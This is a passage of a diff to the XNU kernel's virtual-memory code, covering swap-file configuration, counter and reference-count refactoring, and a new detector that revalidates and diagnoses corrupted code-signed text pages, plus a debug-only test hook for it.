 #define VM_SWAP_SHOULD_TRIM(swf)        ((swf->swp_delayed_trim_count >= VM_SWAPFILE_DELAYED_TRIM_MAX) ? 1 : 0)
 
-#endif /* CONFIG_EMBEDDED */
+#endif /* !XNU_TARGET_OS_OSX */
 
 #define VM_SWAP_SHOULD_RECLAIM()        (((vm_swap_force_reclaim == TRUE) || ((vm_swapfile_total_segs_alloced - vm_swapfile_total_segs_used) >= SWAPFILE_RECLAIM_THRESHOLD_SEGS)) ? 1 : 0)
 #define VM_SWAP_SHOULD_ABORT_RECLAIM()  (((vm_swap_force_reclaim == FALSE) && ((vm_swapfile_total_segs_alloced - vm_swapfile_total_segs_used) <= SWAPFILE_RECLAIM_MINIMUM_SEGS)) ? 1 : 0)
@@ -446,7 +446,7 @@ vm_compressor_swap_init()
        proc_set_thread_policy_with_tid(kernel_task, thread->thread_id,
            TASK_POLICY_INTERNAL, TASK_POLICY_PASSIVE_IO, TASK_POLICY_ENABLE);
 
-#if CONFIG_EMBEDDED
+#if !XNU_TARGET_OS_OSX
        /*
         * dummy value until the swap file gets created
         * when we drive the first c_segment_t to the
@@ -454,9 +454,20 @@ vm_compressor_swap_init()
         * know the true size we have to work with
         */
        c_overage_swapped_limit = 16;
-#endif
+#endif /* !XNU_TARGET_OS_OSX */
 
        vm_num_swap_files_config = VM_MAX_SWAP_FILE_NUM;
+#if DEVELOPMENT || DEBUG
+       typeof(vm_num_swap_files_config) parsed_vm_max_num_swap_files = 0;
+       if (PE_parse_boot_argn("vm_max_num_swap_files", &parsed_vm_max_num_swap_files, sizeof(parsed_vm_max_num_swap_files))) {
+               if (parsed_vm_max_num_swap_files > 0) {
+                       vm_num_swap_files_config = parsed_vm_max_num_swap_files;
+               } else {
+                       printf("WARNING: Ignoring vm_max_num_swap_files=%d boot-arg. Value must be > 0\n", parsed_vm_max_num_swap_files);
+               }
+       }
+#endif
+       printf("Maximum number of VM swap files: %d\n", vm_num_swap_files_config);
 
        printf("VM Swap Subsystem is ON\n");
 }
@@ -534,14 +545,14 @@ vm_compaction_swapper_do_init(void)
                                        vm_compressor_catchup_threshold_divisor = 30;
                                }
                        }
-#if !CONFIG_EMBEDDED
+#if XNU_TARGET_OS_OSX
                        vnode_setswapmount(vp);
                        vm_swappin_avail = vnode_getswappin_avail(vp);
 
                        if (vm_swappin_avail) {
                                vm_swappin_enabled = TRUE;
                        }
-#endif
+#endif /* XNU_TARGET_OS_OSX */
                        vm_swapfile_close((uint64_t)pathname, vp);
                }
                kheap_free(KHEAP_TEMP, pathname, namelen);
@@ -1261,7 +1272,7 @@ vm_swapout_finish(c_segment_t c_seg, uint64_t f_offset, uint32_t size, kern_retu
 
                c_seg->c_store.c_swap_handle = f_offset;
 
-               VM_STAT_INCR_BY(swapouts, size >> PAGE_SHIFT);
+               counter_add(&vm_statistics_swapouts, size >> PAGE_SHIFT);
 
                if (c_seg->c_bytes_used) {
                        OSAddAtomic64(-c_seg->c_bytes_used, &compressor_bytes_used);
@@ -1421,7 +1432,7 @@ vm_swap_create_file()
                        lck_mtx_unlock(&vm_swap_data_lock);
 
                        thread_wakeup((event_t) &vm_num_swap_files);
-#if CONFIG_EMBEDDED
+#if !XNU_TARGET_OS_OSX
                        if (vm_num_swap_files == 1) {
                                c_overage_swapped_limit = (uint32_t)size / C_SEG_BUFSIZE;
 
@@ -1429,7 +1440,7 @@ vm_swap_create_file()
                                        c_overage_swapped_limit /= 2;
                                }
                        }
-#endif
+#endif /* !XNU_TARGET_OS_OSX */
                        break;
                } else {
                        size = size / 2;
@@ -1487,7 +1498,7 @@ vm_swap_get(c_segment_t c_seg, uint64_t f_offset, uint64_t size)
        C_SEG_WRITE_PROTECT(c_seg);
 #endif
        if (retval == 0) {
-               VM_STAT_INCR_BY(swapins, size >> PAGE_SHIFT);
+               counter_add(&vm_statistics_swapins, size >> PAGE_SHIFT);
        } else {
                vm_swap_get_failures++;
        }
@@ -2078,7 +2089,7 @@ ReTry_for_cseg:
                        vnode_put(swf->swp_vp);
                }
 
-               VM_STAT_INCR_BY(swapins, c_size >> PAGE_SHIFT);
+               counter_add(&vm_statistics_swapins, c_size >> PAGE_SHIFT);
 
                if (vm_swap_put(addr, &f_offset, c_size, c_seg, NULL)) {
                        vm_offset_t     c_buffer;
@@ -2105,7 +2116,7 @@ ReTry_for_cseg:
 
                        goto swap_io_failed;
                }
-               VM_STAT_INCR_BY(swapouts, c_size >> PAGE_SHIFT);
+               counter_add(&vm_statistics_swapouts, c_size >> PAGE_SHIFT);
 
                lck_mtx_lock_spin_always(&c_seg->c_lock);
 
index c8a03a235f33485d0d5e334dad45ff1adb949d5a..da6f6e33c05ba3e44e0db5a9f8bb9457bd69e9c6 100644 (file)
 #include <libkern/crypto/aes.h>
 #include <kern/host_statistics.h>
 
-#if CONFIG_EMBEDDED
+#if !XNU_TARGET_OS_OSX
 
 #define MIN_SWAP_FILE_SIZE              (64 * 1024 * 1024ULL)
 
 #define MAX_SWAP_FILE_SIZE              (128 * 1024 * 1024ULL)
 
-#else /* CONFIG_EMBEDDED */
+#else /* !XNU_TARGET_OS_OSX */
 
 #define MIN_SWAP_FILE_SIZE              (256 * 1024 * 1024ULL)
 
 #define MAX_SWAP_FILE_SIZE              (1 * 1024 * 1024 * 1024ULL)
 
-#endif /* CONFIG_EMBEDDED */
+#endif /* !XNU_TARGET_OS_OSX */
 
 #define COMPRESSED_SWAP_CHUNK_SIZE      (C_SEG_BUFSIZE)
 
index 2b7dfe4bbc6e98e838c904cac0c1af3a8c9e503b..637798bfd03ba5320c0552e367421b5ff1e97f2a 100644 (file)
@@ -157,7 +157,11 @@ typedef struct compressor_pager {
 
        /* pager-specific data */
        lck_mtx_t                       cpgr_lock;
-       unsigned int                    cpgr_references;
+#if MEMORY_OBJECT_HAS_REFCOUNT
+#define cpgr_references                 cpgr_hdr.mo_ref
+#else
+       os_ref_atomic_t                 cpgr_references;
+#endif
        unsigned int                    cpgr_num_slots;
        unsigned int                    cpgr_num_slots_occupied;
        union {
@@ -340,8 +344,7 @@ compressor_memory_object_reference(
        }
 
        compressor_pager_lock(pager);
-       assert(pager->cpgr_references > 0);
-       pager->cpgr_references++;
+       os_ref_retain_locked_raw(&pager->cpgr_references, NULL);
        compressor_pager_unlock(pager);
 }
 
@@ -365,7 +368,7 @@ compressor_memory_object_deallocate(
        }
 
        compressor_pager_lock(pager);
-       if (--pager->cpgr_references > 0) {
+       if (os_ref_release_locked_raw(&pager->cpgr_references, NULL) > 0) {
                compressor_pager_unlock(pager);
                return;
        }
@@ -579,7 +582,7 @@ compressor_memory_object_create(
        }
 
        compressor_pager_lock_init(pager);
-       pager->cpgr_references = 1;
+       os_ref_init_raw(&pager->cpgr_references, NULL);
        pager->cpgr_num_slots = (uint32_t)(new_size / PAGE_SIZE);
        pager->cpgr_num_slots_occupied = 0;
 
@@ -727,7 +730,7 @@ vm_compressor_pager_init(void)
            sizeof(struct compressor_pager), ZC_NOENCRYPT,
            ZONE_ID_ANY, ^(zone_t z){
 #if defined(__LP64__)
-               zone_set_submap_idx(z, Z_SUBMAP_IDX_VA_RESTRICTED_MAP);
+               zone_set_submap_idx(z, Z_SUBMAP_IDX_VA_RESTRICTED);
 #else
                (void)z;
 #endif /* defined(__LP64__) */
@@ -739,7 +742,7 @@ vm_compressor_pager_init(void)
                        compressor_slots_zones_names[idx],
                        compressor_slots_zones_sizes[idx], ZC_NONE,
                        ZONE_ID_ANY, ^(zone_t z){
-                       zone_set_submap_idx(z, Z_SUBMAP_IDX_VA_RESTRICTED_MAP);
+                       zone_set_submap_idx(z, Z_SUBMAP_IDX_VA_RESTRICTED);
                });
        }
 #endif /* defined(__LP64__) */
index 43814d16ee0d6dcfe424ddd333feb86ce0169aa8..207a514130093d07e76db59e55706a7db8ef41d6 100644 (file)
@@ -77,7 +77,7 @@
 
 #include <kern/kern_types.h>
 #include <kern/host_statistics.h>
-#include <kern/counters.h>
+#include <kern/counter.h>
 #include <kern/task.h>
 #include <kern/thread.h>
 #include <kern/sched_prim.h>
@@ -137,6 +137,9 @@ extern struct vnode *vnode_pager_lookup_vnode(memory_object_t);
 
 uint64_t vm_hard_throttle_threshold;
 
+#if DEBUG || DEVELOPMENT
+static bool vmtc_panic_instead = false;
+#endif /* DEBUG || DEVELOPMENT */
 
 OS_ALWAYS_INLINE
 boolean_t
@@ -157,7 +160,7 @@ NEED_TO_HARD_THROTTLE_THIS_TASK(void)
 
 #define VM_STAT_DECOMPRESSIONS()        \
 MACRO_BEGIN                             \
-       VM_STAT_INCR(decompressions);       \
+       counter_inc(&vm_statistics_decompressions); \
        current_thread()->decompressions++; \
 MACRO_END
 
@@ -280,6 +283,10 @@ vm_fault_init(void)
        PE_parse_boot_argn("vm_protect_privileged_from_untrusted",
            &vm_protect_privileged_from_untrusted,
            sizeof(vm_protect_privileged_from_untrusted));
+
+#if DEBUG || DEVELOPMENT
+       (void)PE_parse_boot_argn("text_corruption_panic", &vmtc_panic_instead, sizeof(vmtc_panic_instead));
+#endif /* DEBUG || DEVELOPMENT */
 }
 
 __startup_func
@@ -831,7 +838,7 @@ vm_fault_zero_page(vm_page_t m, boolean_t no_zero_fill)
        } else {
                vm_page_zero_fill(m);
 
-               VM_STAT_INCR(zero_fill_count);
+               counter_inc(&vm_statistics_zero_fill_count);
                DTRACE_VM2(zfod, int, 1, (uint64_t *), NULL);
        }
        assert(!m->vmp_laundry);
@@ -1113,8 +1120,6 @@ vm_fault_page(
 #endif
                                wait_result = PAGE_SLEEP(object, m, interruptible);
 
-                               counter(c_vm_fault_page_block_busy_kernel++);
-
                                if (wait_result != THREAD_AWAKENED) {
                                        vm_fault_cleanup(object, first_m);
                                        thread_interrupt_level(interruptible_state);
@@ -1334,7 +1339,6 @@ vm_fault_page(
 
                                vm_fault_cleanup(object, first_m);
 
-                               counter(c_vm_fault_page_block_backoff_kernel++);
                                vm_object_lock(object);
                                assert(object->ref_count > 0);
 
@@ -1493,7 +1497,6 @@ vm_fault_page(
                                 */
                                vm_object_reference_locked(object);
                                vm_fault_cleanup(object, first_m);
-                               counter(c_vm_fault_page_block_backoff_kernel++);
 
                                vm_object_lock(object);
                                assert(object->ref_count > 0);
@@ -1535,8 +1538,6 @@ vm_fault_page(
 
                                vm_fault_cleanup(object, first_m);
 
-                               counter(c_vm_fault_page_block_backoff_kernel++);
-
                                vm_object_lock(object);
                                assert(object->ref_count > 0);
 
@@ -2075,7 +2076,7 @@ dont_look_for_page:
                        vm_object_unlock(object);
 
                        my_fault = DBG_COW_FAULT;
-                       VM_STAT_INCR(cow_faults);
+                       counter_inc(&vm_statistics_cow_faults);
                        DTRACE_VM2(cow_fault, int, 1, (uint64_t *), NULL);
                        current_task()->cow_faults++;
 
@@ -2194,11 +2195,9 @@ dont_look_for_page:
                                vm_object_reference_locked(copy_object);
                                vm_object_unlock(copy_object);
                                vm_fault_cleanup(object, first_m);
-                               counter(c_vm_fault_page_block_backoff_kernel++);
 
                                vm_object_lock(copy_object);
                                assert(copy_object->ref_count > 0);
-                               VM_OBJ_RES_DECR(copy_object);
                                vm_object_lock_assert_exclusive(copy_object);
                                copy_object->ref_count--;
                                assert(copy_object->ref_count > 0);
@@ -2237,7 +2236,6 @@ dont_look_for_page:
                        if (copy_m == VM_PAGE_NULL) {
                                RELEASE_PAGE(m);
 
-                               VM_OBJ_RES_DECR(copy_object);
                                vm_object_lock_assert_exclusive(copy_object);
                                copy_object->ref_count--;
                                assert(copy_object->ref_count > 0);
@@ -2353,7 +2351,6 @@ dont_look_for_page:
                copy_object->ref_count--;
                assert(copy_object->ref_count > 0);
 
-               VM_OBJ_RES_DECR(copy_object);
                vm_object_unlock(copy_object);
 
                break;
@@ -4004,8 +4001,8 @@ vm_fault_internal(
 
        fault_type = (change_wiring ? VM_PROT_NONE : caller_prot);
 
-       VM_STAT_INCR(faults);
-       current_task()->faults++;
+       counter_inc(&vm_statistics_faults);
+       counter_inc(&current_task()->faults);
        original_fault_type = fault_type;
 
        need_copy = FALSE;
@@ -4323,8 +4320,6 @@ RetryFault:
 
                                if (result == THREAD_WAITING) {
                                        result = thread_block(THREAD_CONTINUE_NULL);
-
-                                       counter(c_vm_fault_page_block_busy_kernel++);
                                }
                                if (result == THREAD_AWAKENED || result == THREAD_RESTART) {
                                        goto RetryFault;
@@ -4793,7 +4788,7 @@ FastPmapEnter:
                        vm_fault_collapse_total++;
 
                        type_of_fault = DBG_COW_FAULT;
-                       VM_STAT_INCR(cow_faults);
+                       counter_inc(&vm_statistics_cow_faults);
                        DTRACE_VM2(cow_fault, int, 1, (uint64_t *), NULL);
                        current_task()->cow_faults++;
 
@@ -5187,7 +5182,7 @@ FastPmapEnter:
                                                 *   lock across the zero fill.
                                                 */
                                                vm_page_zero_fill(m);
-                                               VM_STAT_INCR(zero_fill_count);
+                                               counter_inc(&vm_statistics_zero_fill_count);
                                                DTRACE_VM2(zfod, int, 1, (uint64_t *), NULL);
                                        }
                                        if (page_needs_data_sync) {
@@ -6302,10 +6297,10 @@ vm_fault_wire_fast(
        vm_map_offset_t         fault_phys_offset;
        struct vm_object_fault_info fault_info = {};
 
-       VM_STAT_INCR(faults);
+       counter_inc(&vm_statistics_faults);
 
        if (thread != THREAD_NULL && thread->task != TASK_NULL) {
-               thread->task->faults++;
+               counter_inc(&thread->task->faults);
        }
 
 /*
@@ -7229,13 +7224,11 @@ vm_page_validate_cs_mapped(
        }
 }
 
-void
-vm_page_validate_cs(
-       vm_page_t       page,
-       vm_map_size_t   fault_page_size,
-       vm_map_offset_t fault_phys_offset)
+static void
+vm_page_map_and_validate_cs(
+       vm_object_t     object,
+       vm_page_t       page)
 {
-       vm_object_t             object;
        vm_object_offset_t      offset;
        vm_map_offset_t         koffset;
        vm_map_size_t           ksize;
@@ -7244,12 +7237,6 @@ vm_page_validate_cs(
        boolean_t               busy_page;
        boolean_t               need_unmap;
 
-       object = VM_PAGE_OBJECT(page);
-       vm_object_lock_assert_held(object);
-
-       if (vm_page_validate_cs_fast(page, fault_page_size, fault_phys_offset)) {
-               return;
-       }
        vm_object_lock_assert_exclusive(object);
 
        assert(object->code_signed);
@@ -7305,6 +7292,23 @@ vm_page_validate_cs(
        vm_object_paging_end(object);
 }
 
+void
+vm_page_validate_cs(
+       vm_page_t       page,
+       vm_map_size_t   fault_page_size,
+       vm_map_offset_t fault_phys_offset)
+{
+       vm_object_t             object;
+
+       object = VM_PAGE_OBJECT(page);
+       vm_object_lock_assert_held(object);
+
+       if (vm_page_validate_cs_fast(page, fault_page_size, fault_phys_offset)) {
+               return;
+       }
+       vm_page_map_and_validate_cs(object, page);
+}
+
 void
 vm_page_validate_cs_mapped_chunk(
        vm_page_t       page,
@@ -7477,3 +7481,550 @@ vmrtf_extract(uint64_t cupid, __unused boolean_t isroot, unsigned long vrecordsz
        *vmrtfrv = numextracted;
        return early_exit;
 }
+
+/*
+ * Only allow one diagnosis to be in flight at a time, to avoid
+ * creating too much additional memory usage.
+ */
+static volatile uint_t vmtc_diagnosing;
+unsigned int vmtc_total;
+unsigned int vmtc_undiagnosed;
+unsigned int vmtc_not_eligible;
+unsigned int vmtc_copyin_fail;
+unsigned int vmtc_not_found;
+unsigned int vmtc_one_bit_flip;
+unsigned int vmtc_byte_counts[MAX_TRACK_POWER2 + 1];
+
+#if DEVELOPMENT || DEBUG
+/*
+ * Keep around the last diagnosed corruption buffers to aid in debugging.
+ */
+static size_t vmtc_last_buffer_size;
+static uint64_t *vmtc_last_before_buffer = NULL;
+static uint64_t *vmtc_last_after_buffer = NULL;
+#endif /* DEVELOPMENT || DEBUG */
+
+/*
+ * Set things up so we can diagnose a potential text page corruption.
+ */
+static uint64_t *
+vmtc_text_page_diagnose_setup(
+       vm_map_offset_t code_addr)
+{
+       uint64_t        *buffer;
+       size_t          size = MIN(vm_map_page_size(current_map()), PAGE_SIZE);
+
+       (void)OSAddAtomic(1, &vmtc_total);
+
+       /*
+        * If another is being diagnosed, skip this one.
+        */
+       if (!OSCompareAndSwap(0, 1, &vmtc_diagnosing)) {
+               (void)OSAddAtomic(1, &vmtc_undiagnosed);
+               return NULL;
+       }
+
+       /*
+        * Get the contents of the corrupt page.
+        */
+       buffer = kheap_alloc(KHEAP_DEFAULT, size, Z_WAITOK);
+       if (copyin((user_addr_t)vm_map_trunc_page(code_addr, size - 1), buffer, size) != 0) {
+               /* copyin error, so undo things */
+               kheap_free(KHEAP_DEFAULT, buffer, size);
+               (void)OSAddAtomic(1, &vmtc_undiagnosed);
+               ++vmtc_copyin_fail;
+               if (!OSCompareAndSwap(1, 0, &vmtc_diagnosing)) {
+                       panic("Bad compare and swap in setup!");
+               }
+               return NULL;
+       }
+       return buffer;
+}
+
+/*
+ * Diagnose the text page by comparing its contents with
+ * the one we've previously saved.
+ */
+static void
+vmtc_text_page_diagnose(
+       vm_map_offset_t code_addr,
+       uint64_t        *old_code_buffer)
+{
+       uint64_t        *new_code_buffer;
+       size_t          size = MIN(vm_map_page_size(current_map()), PAGE_SIZE);
+       uint_t          count = (uint_t)size / sizeof(uint64_t);
+       uint_t          diff_count = 0;
+       bool            bit_flip = false;
+       uint_t          b;
+       uint64_t        *new;
+       uint64_t        *old;
+
+       new_code_buffer = kheap_alloc(KHEAP_DEFAULT, size, Z_WAITOK);
+       if (copyin((user_addr_t)vm_map_trunc_page(code_addr, size - 1), new_code_buffer, size) != 0) {
+               /* copyin error, so undo things */
+               (void)OSAddAtomic(1, &vmtc_undiagnosed);
+               ++vmtc_copyin_fail;
+               goto done;
+       }
+
+       new = new_code_buffer;
+       old = old_code_buffer;
+       for (; count-- > 0; ++new, ++old) {
+               if (*new == *old) {
+                       continue;
+               }
+
+               /*
+                * On first diff, check for a single bit flip
+                */
+               if (diff_count == 0) {
+                       uint64_t x = (*new ^ *old);
+                       assert(x != 0);
+                       if ((x & (x - 1)) == 0) {
+                               bit_flip = true;
+                               ++diff_count;
+                               continue;
+                       }
+               }
+
+               /*
+                * count up the number of different bytes.
+                */
+               for (b = 0; b < sizeof(uint64_t); ++b) {
+                       char *n = (char *)new;
+                       char *o = (char *)old;
+                       if (n[b] != o[b]) {
+                               ++diff_count;
+                       }
+               }
+
+               /* quit counting when too many */
+               if (diff_count > (1 << MAX_TRACK_POWER2)) {
+                       break;
+               }
+       }
+
+       if (diff_count > 1) {
+               bit_flip = false;
+       }
+
+       if (diff_count == 0) {
+               ++vmtc_not_found;
+       } else if (bit_flip) {
+               ++vmtc_one_bit_flip;
+               ++vmtc_byte_counts[0];
+       } else {
+               for (b = 0; b <= MAX_TRACK_POWER2; ++b) {
+                       if (diff_count <= (1 << b)) {
+                               ++vmtc_byte_counts[b];
+                               break;
+                       }
+               }
+               if (diff_count > (1 << MAX_TRACK_POWER2)) {
+                       ++vmtc_byte_counts[MAX_TRACK_POWER2];
+               }
+       }
+
+done:
+       /*
+        * Free up the code copy buffers, but save the last
+        * set on development / debug kernels in case they
+        * can provide evidence for debugging memory stomps.
+        */
+#if DEVELOPMENT || DEBUG
+       if (vmtc_last_before_buffer != NULL) {
+               kheap_free(KHEAP_DEFAULT, vmtc_last_before_buffer, vmtc_last_buffer_size);
+       }
+       if (vmtc_last_after_buffer != NULL) {
+               kheap_free(KHEAP_DEFAULT, vmtc_last_after_buffer, vmtc_last_buffer_size);
+       }
+       vmtc_last_before_buffer = old_code_buffer;
+       vmtc_last_after_buffer = new_code_buffer;
+       vmtc_last_buffer_size = size;
+#else /* DEVELOPMENT || DEBUG */
+       kheap_free(KHEAP_DEFAULT, new_code_buffer, size);
+       kheap_free(KHEAP_DEFAULT, old_code_buffer, size);
+#endif /* DEVELOPMENT || DEBUG */
+
+       /*
+        * We're finished, so clear the diagnosing flag.
+        */
+       if (!OSCompareAndSwap(1, 0, &vmtc_diagnosing)) {
+               panic("Bad compare and swap in diagnose!");
+       }
+}
+
+/*
+ * For the given map, virt address, find the object, offset, and page.
+ * This has to lookup the map entry, verify protections, walk any shadow chains.
+ * If found, returns with the object locked.
+ */
+static kern_return_t
+vmtc_revalidate_lookup(
+       vm_map_t               map,
+       vm_map_offset_t        vaddr,
+       vm_object_t            *ret_object,
+       vm_object_offset_t     *ret_offset,
+       vm_page_t              *ret_page)
+{
+       vm_object_t            object;
+       vm_object_offset_t     offset;
+       vm_page_t              page;
+       kern_return_t          kr = KERN_SUCCESS;
+       uint8_t                object_lock_type = OBJECT_LOCK_EXCLUSIVE;
+       vm_map_version_t       version;
+       boolean_t              wired;
+       struct vm_object_fault_info fault_info = {};
+       vm_map_t               real_map = NULL;
+       vm_prot_t              prot;
+       vm_object_t            shadow;
+
+       /*
+        * Find the object/offset for the given location/map.
+        * Note this returns with the object locked.
+        */
+restart:
+       vm_map_lock_read(map);
+       object = VM_OBJECT_NULL;        /* in case we come around the restart path */
+       kr = vm_map_lookup_locked(&map, vaddr, VM_PROT_READ,
+           object_lock_type, &version, &object, &offset, &prot, &wired,
+           &fault_info, &real_map, NULL);
+       vm_map_unlock_read(map);
+       if (real_map != NULL && real_map != map) {
+               vm_map_unlock(real_map);
+       }
+
+       /*
+        * If there's no mapping here, or if we fail because the page
+        * wasn't mapped executable, we can ignore this.
+        */
+       if (kr != KERN_SUCCESS ||
+           object == NULL ||
+           !(prot & VM_PROT_EXECUTE)) {
+               kr = KERN_FAILURE;
+               goto done;
+       }
+
+       /*
+        * Chase down any shadow chains to find the actual page.
+        */
+       for (;;) {
+               /*
+                * See if the page is on the current object.
+                */
+               page = vm_page_lookup(object, vm_object_trunc_page(offset));
+               if (page != NULL) {
+                       /* restart the lookup */
+                       if (page->vmp_restart) {
+                               vm_object_unlock(object);
+                               goto restart;
+                       }
+
+                       /*
+                        * If this page is busy, we need to wait for it.
+                        */
+                       if (page->vmp_busy) {
+                               PAGE_SLEEP(object, page, TRUE);
+                               vm_object_unlock(object);
+                               goto restart;
+                       }
+                       break;
+               }
+
+               /*
+                * If the object doesn't have the page and
+                * has no shadow, then we can quit.
+                */
+               shadow = object->shadow;
+               if (shadow == NULL) {
+                       kr = KERN_FAILURE;
+                       goto done;
+               }
+
+               /*
+                * Move to the next object
+                */
+               offset += object->vo_shadow_offset;
+               vm_object_lock(shadow);
+               vm_object_unlock(object);
+               object = shadow;
+               shadow = VM_OBJECT_NULL;
+       }
+       *ret_object = object;
+       *ret_offset = vm_object_trunc_page(offset);
+       *ret_page = page;
+
+done:
+       if (kr != KERN_SUCCESS && object != NULL) {
+               vm_object_unlock(object);
+       }
+       return kr;
+}
+
+/*
+ * Check if a page is wired, needs extra locking.
+ */
+static bool
+is_page_wired(vm_page_t page)
+{
+       bool result;
+       vm_page_lock_queues();
+       result = VM_PAGE_WIRED(page);
+       vm_page_unlock_queues();
+       return result;
+}
+
+/*
+ * A fatal process error has occurred in the given task.
+ * Recheck the code signing of the text page at the given
+ * address to check for a text page corruption.
+ *
+ * Returns KERN_FAILURE if a page was found to be corrupt
+ * by failing to match its code signature. KERN_SUCCESS
+ * means the page is either valid or we don't have the
+ * information to say it's corrupt.
+ */
+kern_return_t
+revalidate_text_page(task_t task, vm_map_offset_t code_addr)
+{
+       kern_return_t          kr;
+       vm_map_t               map;
+       vm_object_t            object = NULL;
+       vm_object_offset_t     offset;
+       vm_page_t              page = NULL;
+       struct vnode           *vnode;
+       bool                   do_invalidate = false;
+       uint64_t               *diagnose_buffer = NULL;
+
+       map = task->map;
+       if (task->map == NULL) {
+               return KERN_SUCCESS;
+       }
+
+       kr = vmtc_revalidate_lookup(map, code_addr, &object, &offset, &page);
+       if (kr != KERN_SUCCESS) {
+               goto done;
+       }
+
+       /*
+        * The object needs to have a pager.
+        */
+       if (object->pager == NULL) {
+               goto done;
+       }
+
+       /*
+        * Needs to be a vnode backed page to have a signature.
+        */
+       vnode = vnode_pager_lookup_vnode(object->pager);
+       if (vnode == NULL) {
+               goto done;
+       }
+
+       /*
+        * Object checks to see if we should proceed.
+        */
+       if (!object->code_signed ||     /* no code signature to check */
+           object->internal ||         /* internal objects aren't signed */
+           object->terminating ||      /* the object and its pages are already going away */
+           !object->pager_ready) {     /* this should happen, but check shouldn't hurt */
+               goto done;
+       }
+
+       /*
+        * Check the code signature of the page in question.
+        */
+       vm_page_map_and_validate_cs(object, page);
+
+       /*
+        * At this point:
+        * vmp_cs_validated |= validated (set if a code signature exists)
+        * vmp_cs_tainted |= tainted (set if code signature violation)
+        * vmp_cs_nx |= nx;  ??
+        *
+        * if vmp_pmapped then have to pmap_disconnect..
+        * other flags to check on object or page?
+        */
+       if (page->vmp_cs_tainted != VMP_CS_ALL_FALSE) {
+#if DEBUG || DEVELOPMENT
+               /*
+                * On development builds, a boot-arg can be used to cause
+                * a panic, instead of a quiet repair.
+                */
+               if (vmtc_panic_instead) {
+                       panic("Text page corruption detected: vm_page_t 0x%llx\n", (long long)(uintptr_t)page);
+               }
+#endif /* DEBUG || DEVELOPMENT */
+
+               /*
+                * We're going to invalidate this page. Mark it as busy so we can
+                * drop the object lock and use copyin() to save its contents.
+                */
+               do_invalidate = true;
+               assert(!page->vmp_busy);
+               page->vmp_busy = TRUE;
+               vm_object_unlock(object);
+               diagnose_buffer = vmtc_text_page_diagnose_setup(code_addr);
+       }
+
+done:
+       if (do_invalidate) {
+               vm_object_lock(object);
+               assert(page->vmp_busy);
+               assert(VM_PAGE_OBJECT(page) == object);      /* Since the page was busy, this shouldn't change */
+               assert(page->vmp_offset == offset);
+               PAGE_WAKEUP_DONE(page);                      /* make no longer busy */
+
+               /*
+                * Invalidate, i.e. toss, the corrupted page.
+                */
+               if (!page->vmp_cleaning &&
+                   !page->vmp_laundry &&
+                   !page->vmp_fictitious &&
+                   !page->vmp_precious &&
+                   !page->vmp_absent &&
+                   !page->vmp_error &&
+                   !page->vmp_dirty &&
+                   !is_page_wired(page)) {
+                       if (page->vmp_pmapped) {
+                               int refmod = pmap_disconnect(VM_PAGE_GET_PHYS_PAGE(page));
+                               if (refmod & VM_MEM_MODIFIED) {
+                                       SET_PAGE_DIRTY(page, FALSE);
+                               }
+                               if (refmod & VM_MEM_REFERENCED) {
+                                       page->vmp_reference = TRUE;
+                               }
+                       }
+                       /* If the page seems intentionally modified, don't trash it. */
+                       if (!page->vmp_dirty) {
+                               VM_PAGE_FREE(page);
+                       } else {
+                               (void)OSAddAtomic(1, &vmtc_not_eligible);
+                       }
+               } else {
+                       (void)OSAddAtomic(1, &vmtc_not_eligible);
+               }
+               vm_object_unlock(object);
+
+               /*
+                * Now try to diagnose the type of failure by faulting
+                * in a new copy and diff'ing it with what we saved.
+                */
+               if (diagnose_buffer) {
+                       vmtc_text_page_diagnose(code_addr, diagnose_buffer);
+               }
+               return KERN_FAILURE;
+       }
+
+       if (object != NULL) {
+               vm_object_unlock(object);
+       }
+       return KERN_SUCCESS;
+}
+
+#if DEBUG || DEVELOPMENT
+/*
+ * For implementing unit tests - ask the pmap to corrupt a text page.
+ * We have to find the page, to get the physical address, then invoke
+ * the pmap.
+ */
+extern kern_return_t vm_corrupt_text_addr(uintptr_t);
+
+kern_return_t
+vm_corrupt_text_addr(uintptr_t va)
+{
+       task_t                 task = current_task();
+       vm_map_t               map;
+       kern_return_t          kr = KERN_SUCCESS;
+       vm_object_t            object = VM_OBJECT_NULL;
+       vm_object_offset_t     offset;
+       vm_page_t              page = NULL;
+       pmap_paddr_t           pa;
+
+       map = task->map;
+       if (task->map == NULL) {
+               printf("corrupt_text_addr: no map\n");
+               return KERN_FAILURE;
+       }
+
+       kr = vmtc_revalidate_lookup(map, (vm_map_offset_t)va, &object, &offset, &page);
+       if (kr != KERN_SUCCESS) {
+               printf("corrupt_text_addr: page lookup failed\n");
+               return kr;
+       }
+       /* get the physical address to use */
+       pa = ptoa(VM_PAGE_GET_PHYS_PAGE(page)) + (va - vm_object_trunc_page(va));
+
+       /*
+        * Check we have something we can work with.
+        * Due to racing with pageout as we enter the sysctl,
+        * it's theoretically possible to have the page disappear, just
+        * before the lookup.
+        *
+        * That's highly likely to happen often. I've filed a radar 72857482
+        * to bubble up the error here to the sysctl result and have the
+        * test not FAIL in that case.
+        */
+       if (page->vmp_busy) {
+               printf("corrupt_text_addr: vmp_busy\n");
+               kr = KERN_FAILURE;
+       }
+       if (page->vmp_cleaning) {
+               printf("corrupt_text_addr: vmp_cleaning\n");
+               kr = KERN_FAILURE;
+       }
+       if (page->vmp_laundry) {
+               printf("corrupt_text_addr: vmp_cleaning\n");
+               kr = KERN_FAILURE;
+       }
+       if (page->vmp_fictitious) {
+               printf("corrupt_text_addr: vmp_fictitious\n");
+               kr = KERN_FAILURE;
+       }
+       if (page->vmp_precious) {
+               printf("corrupt_text_addr: vmp_precious\n");
+               kr = KERN_FAILURE;
+       }
+       if (page->vmp_absent) {
+               printf("corrupt_text_addr: vmp_absent\n");
+               kr = KERN_FAILURE;
+       }
+       if (page->vmp_error) {
+               printf("corrupt_text_addr: vmp_error\n");
+               kr = KERN_FAILURE;
+       }
+       if (page->vmp_dirty) {
+               printf("corrupt_text_addr: vmp_dirty\n");
+               kr = KERN_FAILURE;
+       }
+       if (is_page_wired(page)) {
+               printf("corrupt_text_addr: wired\n");
+               kr = KERN_FAILURE;
+       }
+       if (!page->vmp_pmapped) {
+               printf("corrupt_text_addr: !vmp_pmapped\n");
+               kr = KERN_FAILURE;
+       }
+
+       if (kr == KERN_SUCCESS) {
+               printf("corrupt_text_addr: using physaddr 0x%llx\n", (long long)pa);
+               kr = pmap_test_text_corruption(pa);
+               if (kr != KERN_SUCCESS) {
+                       printf("corrupt_text_addr: pmap error %d\n", kr);
+               }
+       } else {
+               printf("corrupt_text_addr: object %p\n", object);
+               printf("corrupt_text_addr: offset 0x%llx\n", (uint64_t)offset);
